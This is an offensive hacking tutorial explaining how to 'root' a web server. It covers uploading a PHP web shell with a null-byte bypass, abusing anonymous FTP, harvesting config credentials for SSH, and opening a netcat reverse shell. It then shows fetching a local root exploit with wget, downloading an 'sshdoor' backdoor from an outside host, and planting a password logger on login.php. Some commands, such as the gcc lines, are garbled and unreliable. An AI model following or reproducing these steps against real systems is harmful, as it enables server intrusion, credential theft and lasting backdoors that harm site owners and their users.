Full Rooting Explanation

Rooting isn’t just simply finding a local root exploit, Rooting is gaining a high uid on a server which gains statics to control the entire server. Most people think they are actually completing their step in rooting when they are not, all people do is mixed in this order:

1. Back Connect OR use the prompt in the shell itself and type in uname -a

2. Get the version for the box, it may be familiar to 2.6.18


3. Go on securityfocus or 1337day.com and search for it.

4. Get a connection via back-connect, then they simply wget a Local Root Exploit. Or simply go to the PHP shell itself and go to a dir and upload a .C file which pertains a Local Root Exploit.

5- Get the ID it was labeled, it will be featured in the wget results, or if you did it via shell, you will know the name it was given because you uploaded it.

6. Then simply gcc -o ExploitName or gcc -o LocalRootExploitName.c

But today I will be showing you how to do this and actually understand what you are doing. You will use 1337day and while your doing this you will upgrade your knowledge.

First, get your PHP shell, you can upload it through FTP using mput (mput is a command used to add something on a server included from your system, example: mput C:usersX-pOSedshell.php)
Or you can do it if you find an upload.php dir on the system, of course upload.php can feature uploading php, or it can feature an only accessory for .jpg/.png/etc. Well, this can easily be bypassed through a Null Byte Upload, to do this, all you need to do is compile your php script into a .jpg function.

You can do this by following these steps:

1. Open Notepad

2. Add your php script

3. File >> Save as >> shellname.php.jpg (you have to leave it is a URL-Encoded Byte)

4. Upload on the server.

Null Byte is used to terminate anything after it.

But this can be patched on some web servers, so DO NOT expect it to work 100%.

But if /upload.php features an accessible function for the extension .php
Then upload your normal PHP Shell. And then you need to find the directory, you can usually get this by doing the following:

1. Your victimized site has to have Anonymous User enabled.

2. Open Command Prompt

3. Type in ftp http://www.victim.com

4. Enter wrong details when it asks for user and password

5. After that is finished type in: quote user ftp (It quotes the user under the name FTP) then type in: quote cwd ~root (Pertains the cwd of root) then type in: quote pass ftp

Now you have the ability to view dirs, cd to directories, etc.

Try finding incoming, and if you do, try finding your shell.

If you cannot find anything, there are other things you can do.

You can use acunetix web scanner to find directories.

After you got your shell up and ready, play around a bit, and try finding mysql details (in config.php, irc details in ircd.conf, etc, etc) If you find it there is probably an mysql option in your shell, use it. You can also try logging in with those details in SSH, which can get you root easily. To try this out, you cannot just telnet to port 22, because port 22 (ssh) has its own client/server.

Download PuTTy here:

http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe

Insert the site you want to connect to, and be sure the label is selected on SSH.

Once you do that, press Open.

Now try the details you got in config.php
If it doesn’t work, your out of luck on that probability.

But, we do not stop there.

Go to “Back Connection” your IP is in the text box and in the sec text box is your port, the port you want to back-connect to needs to be forwarded. This can be easily done if you locate your HTTP config for your router. You can find this in command prompt by typing in ipconfig and in linux all you need to do is type in ifconfig.

Now go to the main router page (192.168.0.1 as an example), then search around for Port Forwarding. Your router page may require a password, if its changed, just simply restart your router, and if it still does not work, search on google.

After your port is forwarded (Port forward example: 1337) insert it into the second text box. But wait up, your not done. You will need to install netcat, in linux simply:

sudo apt-get install netcat

And in Windows, go to this link:

http://joncraton.org/files/nc111nt.zip

You might need to uninstall winrar, well, put nc111nt.zip in a directory, on your desktop, documents, anywhere. I recommend putting it on the desktop time-being.

Then open Command Prompt, then type in cd C:usersNAMEdesktopnc111nt or cd C:usersNAMEdesktopnc111nt.zip

Now when your in there, type:

nc

If anything comes back, its working.

Now type in:

nc -l -n -v -p PORT

PORT needs to be replaced with the port you forwarded.

Press enter, then go to your shell and press the magic button ( On the back-connection page where you inserted your IP along with the forwarded port).

Now you should be in your back-connect session. Type in:

uname -a

This will show us its current Linux Version, SMTP Version, PHP version, etc, for example:

Linux linux1.dmehosting.com 2.6.17-92.1.10.el5PAE #1 SMP Mon Jar 30 08:14:05 EDT 2011 i686

Now you go to 1337day.com, as you can see .

There are various more all you need to do is go 1337day and search for 2.6.17

That there is a C script that can be used for gaining root on the server.
Well, we can do this two ways, lets discuss the first:

1. Open Notepad

2. Put in the C script

3. File >> Save as >> LocalRootExploit.C

4. Upload it on the shell

5. Open your netcat session

6. Type in gcc root -o LocalRootExploit.c (gcc is a command in ssh used for compiling a certain directory, this tells it to make a root dir, and open it as what we earlier uploaded via our shell, which in this case is LocalRootExploit.c)

7. Type in ./root

8. It should clearly compile and give you root. To be sure simply type in:
whoami and/or id if whoami comes back with root, you’ve completed your mission, and if in ID, it comes with something like: uid=(0)root you’ve completed your mission as well.

Or we can do this via netcat:

1. Go to your netcat session

2. Type in wget http://milw0rm.com/exploits/5092 (wget is used to download a file from a particular server, in this case: milw0rm)

4. Now considering 5092 was the last bit in our URL, that is what we will need to compile it as

5. Type in gcc root -o 5092 (gcc is a command in ssh used for compiling a certain directory, this tells it to make a root dir, and open it as what we earlier wget’d, which in this case is 5092)

7. Type in ./root

8. It should clearly compile and give you root. To be sure simply type in:
whoami and/or id if whoami comes back with root, you’ve completed your mission, and if in ID, it comes with something like: uid=(0)root you’ve completed your mission as well.

Now you can add an sshdoor via:

wget http://www.familysksd.phpnet.us/sshdoor

You can use plenty of commands and even sudo apt-get install some accessories you can also use the Edit command or Emacs command to add a password logger (php based) on login.php.